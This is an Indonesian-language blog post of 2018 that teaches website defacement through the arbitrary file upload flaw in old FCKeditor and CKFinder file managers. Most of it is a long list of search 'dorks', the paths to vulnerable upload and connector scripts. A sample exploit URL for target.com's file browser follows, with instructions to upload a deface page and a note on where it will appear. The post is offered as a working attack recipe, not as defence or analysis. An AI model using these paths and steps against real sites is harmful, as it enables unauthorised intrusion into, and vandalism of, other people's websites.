Jumat, 14 Desember 2018

Deface Metode FCKeditor

Deface dengan metode FCKeditor



Author : Mr.Rvms
Blogspot : https://bl4ckh4mm3r.blogspot.com/
Vulnerability Style : File Upload
Bug : File Upload


( Dork ) :

/assets/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
/admin/fckeditor/editor/filemanager/connectors/php/connector.php
/admin/fckeditor/editor/filemanager/connectors/php/upload.php
/admin/fckeditor/editor/filemanager/upload/asp/upload.asp
/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
/admin/fckeditor/editor/filemanager/upload/php/upload.php
/includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
/includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
/includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
/includes/fckeditor/editor/filemanager/connectors/asp/connector.asp
/includes/fckeditor/editor/filemanager/connectors/asp/upload.asp 
/includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
/includes/fckeditor/editor/filemanager/connectors/php/connector.php 
/includes/fckeditor/editor/filemanager/connectors/php/upload.php 
/includes/fckeditor/editor/filemanager/upload/asp/upload.asp 
/includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx 
/includes/fckeditor/editor/filemanager/upload/php/upload.php
/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
/fckeditor/editor/filemanager/connectors/asp/upload.asp
/fckeditor/editor/filemanager/connectors/php/upload.php
/fckeditor/editor/filemanager/upload/aspx/upload.aspx
/fckeditor/editor/filemanager/upload/asp/upload.asp
/fckeditor/editor/filemanager/upload/php/upload.php
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php
/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
/includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
/includes/fckeditor/editor/filemanager/connectors/asp/upload.asp
/includes/fckeditor/editor/filemanager/connectors/php/upload.php
/includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx
/includes/fckeditor/editor/filemanager/upload/asp/upload.asp
/includes/fckeditor/editor/filemanager/upload/php/upload.php
/includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/includes/fckeditor/editor/filemanager/connectors/asp/connector.asp
/includes/fckeditor/editor/filemanager/connectors/php/connector.php
/includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
/includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
/admin/fckeditor/editor/filemanager/connectors/php/connector.php
/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
/admin/fckeditor/editor/filemanager/connectors/php/upload.php
/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
/admin/fckeditor/editor/filemanager/upload/asp/upload.asp
/admin/fckeditor/editor/filemanager/upload/php/upload.php
/ckeditor/ckfinder/core/connector/asp/connector.asp
/ckeditor/ckfinder/core/connector/php/connector.php
/ckeditor/ckfinder/core/connector/aspx/connector.aspx 

Exploit FCKeditor Artibary File Upload :

http://target.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Upload Script deface kalian

 Hasil Deface kita ada di

www.target.com/files ( kalo script deface kalian di rename jadi index.html)
www.target.com/files/namascriptlu.html ( kalo lu rename script deface lu bebas,contohnya tai.html )

Kurang Jelas ? Contact me Here
Sekian Dan Terima Kasih ^_^






Tidak ada komentar:

Posting Komentar